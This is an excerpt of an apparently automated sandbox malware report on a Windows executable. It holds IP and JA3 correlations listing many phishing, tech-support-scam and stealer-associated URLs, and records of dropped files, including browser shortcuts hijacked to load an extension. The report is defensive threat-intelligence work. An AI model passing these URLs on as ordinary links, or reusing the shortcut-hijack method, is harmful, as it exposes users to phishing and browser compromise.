                                                                                                                                          https://www.tryinteract.com/share/quiz/66104ad50cd614001579198dGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                          • 23.223.209.71
                                                                                                                                          https://fixauthconnectapp.pages.dev/connection-module/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 23.56.163.106
                                                                                                                                          https://www.landpage-preview.com/51b82e8d-f243-4317-9054-fa7b6c00d3d3Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 23.215.0.40
                                                                                                                                          http://easywithai.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 23.33.180.25
                                                                                                                                          DRBS6405.zipGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                          • 23.56.8.114
                                                                                                                                          4_10_AC-7539.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                          • 23.56.8.114
                                                                                                                                          SecuriteInfo.com.Program.Unwanted.5412.26753.681.exeGet hashmaliciousHawkEye, PureLog StealerBrowse
                                                                                                                                          • 23.222.202.7
                                                                                                                                          EDGECASTUShttps://wwwlkwmwm12m21mm211.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 152.199.4.44
                                                                                                                                          http://tacticaloutsourcing.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 152.199.5.152
                                                                                                                                          440e4d.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                          • 93.184.215.201
                                                                                                                                          https://dhl.0118.viabuscrop.com/home/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 192.229.173.16
                                                                                                                                          https://dhl.9021.tripgg.com/home/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 152.199.5.152
                                                                                                                                          https://editioncnn.anniesnewburypport.com/c2FsZXNAY2VudHJhbGlhbi5jb20uYXU=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                          • 152.195.19.97
                                                                                                                                          http://montrealirishmonument.com/wp-content/uploads/2023/11/Deehy-Christopher-396x554.jpgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 152.199.5.152
                                                                                                                                          https://tacticaloutsourcing.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 152.199.5.152
                                                                                                                                          http://montrealirishmonument.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 152.199.24.163

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          1138de370e523e824bbca92d049a3777https://track.mltrck.com/?a=160734&c=343241&mt=3Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://editioncnn.anniesnewburypport.com/c2FsZXNAY2VudHJhbGlhbi5jb20uYXU=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://et492.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://app.adjust.com/97grly?bwkblabel=2ch_002&redirect=//minhaclaro.dtmmkt.com.br%2Feffectivemail/redirecionaclique.aspx?idabordagem=5252932746%2526idlink=126090168=%0A66%2526endereco=//tubest%E3%80%82com%E3%80%82tr/toro/ybk5/Z3JhaGFtLmR1ZmZAbWxjaW5zdXJhbmNlLmNvbS5hdQ==&$Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://gm419.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          http://montrealirishmonument.com/wp-content/uploads/2023/11/Deehy-Christopher-396x554.jpgGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://mintmysterypro.web.app/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          https://appnnn7.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-%20%20855-987-2787Get hashmaliciousTechSupportScamBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4https://track.mltrck.com/?a=160734&c=343241&mt=3Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          https://sleekbio.com/gekit46167Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          http://montrealirishmonument.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          http://www.beaconsupport.com.auGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          https://ob96hlhzrik.larksuite.com/wiki/Vj7PwMjw4ipjz5kc93Guf1KQsfe?from=from_copylinkGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          https://dhl.0118.viabuscrop.com/home/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          https://editioncnn.anniesnewburypport.com/c2FsZXNAY2VudHJhbGlhbi5jb20uYXU=Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81
                                                                                                                                          https://kkx26.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-877-200-1965Get hashmaliciousTechSupportScamBrowse
                                                                                                                                          • 104.118.8.139
                                                                                                                                          • 40.126.24.82
                                                                                                                                          • 20.12.23.50
                                                                                                                                          • 40.126.24.81

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:40 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2222
                                                                                                                                          Entropy (8bit):3.5011540904144827
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8SdTdfTXdARYrnvVdAKRkdA0qOJq87dAKRFdAKRE:8SdJ7O
                                                                                                                                          MD5:8B35A5C2DB1A490D1F07161E0575DF07
                                                                                                                                          SHA1:3892334D54D62206853391D1D9EFCC47047D078A
                                                                                                                                          SHA-256:ACE833898EE9B52358C0936F6216112113972A353FEFBBDFC8A96F293A4AAFFC
                                                                                                                                          SHA-512:5E8167366C9906C3BC50DFD370DFEF96E79712AC32445EA33A7037BF677F0D1A5B3A723E9D8C021B1BB5768BE875E8DD3319CAD90F0C4125805B2A5ADE361CE0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ......,....g1.d.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDWWn....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.A.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-.-.l.o.a.d.-

                                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 11:10:59 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2568
                                                                                                                                          Entropy (8bit):3.686235682567051
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8sQJG+dOSzrhs+frnzldRdkqOJq5dLXuHj0PkFmq4:8G2hpuD0Pkkq
                                                                                                                                          MD5:8B908E879B7DBCBDD3B4B5B8905B5F51
                                                                                                                                          SHA1:8E0BE4CE3A1C67695D4BC40FE489A45D76A1C70F
                                                                                                                                          SHA-256:AAC00C5F6E587E29EB4EB784362C0C491C971E96271B42DCBB02F274A72D2156
                                                                                                                                          SHA-512:CFE1B6FB00A4770B4F0046E26EE270490D94184D6DEA650D12857B238FB2D724EE64E107411CAD1833A0B97CB47AAC92B8B8DCF696997D4FE2CD5568D216E0AF
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. .....|.K....f......?......(>@.....................1....P.O. .:i.....+00.../C:\.....................1.....CWSa..PROGRA~2.........O.ICWSa....................V.......:.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....\.1.....CW.`..MICROS~1..D......(Ux.CW.`..........................6|..M.i.c.r.o.s.o.f.t.....N.1.....CW\a0.Edge..:.......S8.CW\a...........................AI.E.d.g.e.....`.1.....CW`a0.APPLIC~1..H.......S8.CW`a..........................r.N.A.p.p.l.i.c.a.t.i.o.n.....`.2.(>@.=W2b .msedge.exe..F.......S8.CW`a....u.......................q.m.s.e.d.g.e...e.x.e.......k...............-.......j............F.......C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe....B.r.o.w.s.e. .t.h.e. .w.e.b.H.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.1.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.

                                                                                                                                          C:\Users\Public\Desktop\Google Chrome.lnk

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:54 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2210
                                                                                                                                          Entropy (8bit):3.500382402587927
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8Sjl2dfTXdARYrnvPdAKRkdA0qOJq87dAKRFdAKRE:8SjlO70
                                                                                                                                          MD5:C2B4ADD25FBDC60BDF474E9B47CA953D
                                                                                                                                          SHA1:E780B5820C7149C8A19F08291B135CD753D88180
                                                                                                                                          SHA-256:9EEF0C0F2D275ECE9E7CEEB4E9DBCD944F52833FF22E7E46EDB1E6FA51027187
                                                                                                                                          SHA-512:8F02ED168D49344B5CAC1960F82B4003B3C0ED7B5A5CDF8ED8028FA150609FC1E80080CECF47693F1E353421818DB8691FF9707D0C10E6DF3D4B0937EDD8C1B5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ......,.......m.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-.-.l.o.a.d.-.e.x.t.e.n.s

                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\49835a30-183e-4d89-a808-d1396efb5ea6 (copy)

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):12071
                                                                                                                                          Entropy (8bit):7.96872755321021
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:cyr4ZznSBJDPhkr8iwo8ZNNf1RE1+hfM4Hr7Nk9RZzWu22JBJ4/Krc59uESv07+/:5USrDPhkwiUZTf1/hfM4HnNgDzW18BPF
                                                                                                                                          MD5:2A56357C453F2AA3E88B83B9DEFDB505
                                                                                                                                          SHA1:518A83E592497957DC8BB91179A6753262EA265F
                                                                                                                                          SHA-256:2A04E21EC91D5FC2B57C849BBE7985EEBECC407287CCA85551E2D4ED4B0DC93D
                                                                                                                                          SHA-512:58FDE291D0B777AD2719F9F76E3D5C7499FEA91C2B35D574B0FB4A7DA7D6DD193D52652A6DF64A1C4ADA253543A56F47F80DE30757D64B631AC37B421DE1A327
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Cr24....E.........0.."0...*.H.............0.........:.2.W.))...I...5_U(I7nz...2[.;..H...S.../...nb%Yx.6.]i.....u...PDF.i.LJK.?....l.....R...|...j...C..j!.%'..s....[."...Gy...=l)..=.l\....4..Q!$e.=...C.1.%d..B...K.[.l,.....7......y...$7J..G&TT..W.-=jgs[...&.@/.j$....+...yk|l^..Km)\Y..x..}OCXf.....A5s.7..8..o....L..(p[...^e......?&X..:~,.)..C..n...Hh.....<..N..0.....woa6....'&y....tH..*7@..a.t.....F..YQU......<......m!..^.#f.'F".....lt..97U3f...WM....]Lw...)..x...)..Hy Z...l.a.)J~'.y.o.NS.#.,6.D.9UMW..l>.pa.WG.^..L,..B...."p.Y.....<............i.r.{....^tP1.../..|....O.K5......D*A.q.w.u.7....;|".:.6.p..R>2...#...+...mn,..&.....(....le;{.V.......~...M.rC.)....&.W.bJ.. (&...9..A.N..F4wKyd*U..'d,.@.{..+.mF17.^......<...i.M....L..;s..].F.*=.F....K..]d.wD..S..rQ..).>.iO)@.oyi....n.'a..+....x.u..C. ....B....... .>....G.(..n~..CP.D........>...-.....A8]i.].b.2?.p.....+..w....$fT.B.D.*.l.....k../P.?..w.....-Cn...`z.[nO.J..y.....Z..)@..}c...v*a.wde>)..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):808
                                                                                                                                          Entropy (8bit):5.347813855694449
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLqE4K5E4KQcE4KnKDE4KGKZI6KhgLE4qE4j:MWHK5HKQcHKnYHKGSI6ogLHqHj
                                                                                                                                          MD5:4106F23ACFED45F2EFF8C80BF4CA3E61
                                                                                                                                          SHA1:C9128506D321FF0CF8CD6E782FDDEBE605A481FE
                                                                                                                                          SHA-256:A7537E27C79709F2CA9C93D6DD80994AA9FDB9C9F5462BBB49057501E92C6BF4
                                                                                                                                          SHA-512:56EA7B672E471B31F19A684AAF7331083542B08D34CCF160679D9E12C942CCA2D3A726347DEA987AAAB41A5603419677B9379C177F062C39699AFB1D7A049043
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0b896dcc-ff5e-4007-8e28-ff84304b398e.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44137
                                                                                                                                          Entropy (8bit):6.090776782579777
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMCwuF9hDO6vP6O+Wtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6/tbz8hu3VlXr4CRo1
                                                                                                                                          MD5:1AF0B68F6B69583321EA260D915383B4
                                                                                                                                          SHA1:2371D22CAF4D75D1042CD9EB3ED60393E770AA2F
                                                                                                                                          SHA-256:9F918F6A57C456F8D5FA6649FE01C6ACBAF4DD6EB51939ED7607D1594411C608
                                                                                                                                          SHA-512:7CD5840D7F377A794DD9699B68DB05A57F0673AD31E442D294E69BE3B730D37196819F30519AB45B9287B389D63FCF21232BEC37E7CFB256FF522B4731271F09
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\352e43f0-97c9-46ee-83b9-e8569e9e287f.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45467
                                                                                                                                          Entropy (8bit):6.094482038204501
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:2DXzgWPsj/qlGJqIY8GB4x9ZhFrhDO6vP6O9l1ogfK5Pi1cGoup1Xl3jVzXr4CCW:2/Ps+wsI7yO9Zg6Hzchu3VlXr4CRo4
                                                                                                                                          MD5:3D4DEF6DCE1527FA505C06CFFF8DDBEA
                                                                                                                                          SHA1:D19C5754D436AAC1449AF5A136740327B93BA2F5
                                                                                                                                          SHA-256:03A11F2CC39C7205951E6BCE3D807D2F33C27E05DA1C88A4A59BEB11148340C8
                                                                                                                                          SHA-512:28D974C8F7D0FE6480B31B99AA4D4C646213183478500B902753D8E20A998C13156B4E79F543F9BFAADA18EB7DE175C1755276C0D6D7DE2A3F31D66359B851B5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1712906084"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0V

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\78a7b5a9-0f86-414f-9db6-ae60fe731a86.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):44608
                                                                                                                                          Entropy (8bit):6.096527095595211
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB3wuihDO6vP6O9l1Myfw8PWUwncGoup1Xl3jVzXr2:z/Ps+wsI7ynED6Hechu3VlXr4CRo1
                                                                                                                                          MD5:35EA4CEB79B3C4D66F03C26CB450C079
                                                                                                                                          SHA1:27D237EB84A8E2EA4F26CCB996F2DC6C87A992E5
                                                                                                                                          SHA-256:073D11805136C83455BAE3B226A3E3B852D75BFE6691660ECF56ABC5F65E0A7B
                                                                                                                                          SHA-512:75B708413F3E278965DA8D2E875CF430680719DE81BD5EA7DB598F5657A0FB72517A1F10852A00AB3870A1C9136C0443D7343384D632757D1E174CE1F7717D61
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\848e85a9-7540-463b-bd63-448c3008c4f6.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):45544
                                                                                                                                          Entropy (8bit):6.0944518508871255
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:2DXzgWPsj/qlGJqIY8GB4D9ZhFrhDO6vP6O9l18gfK5Pi1cGoup1Xl3jVzXr4CCW:2/Ps+wsI7yy9Zg6HTchu3VlXr4CRo4
                                                                                                                                          MD5:5DBA0C0C3D411668DB2F4FFCA8487725
                                                                                                                                          SHA1:66F0152BE3047F3B9D1FC9E8F4D19E36C328B7A6
                                                                                                                                          SHA-256:1F54A151FB3DF3019BCB0D8F35FA0B7267D9AFB42A37865A6BF6FDF88FC2528A
                                                                                                                                          SHA-512:9B18C345C837E70BC256ABD83CE26FA031F9E0FF4AB65CD2773235F6354EBE55E4516E430BE0850A9667045929AE870E3FB33590BF71C4142A3432336C8F9830
                                                                                                                                          Malicious:false
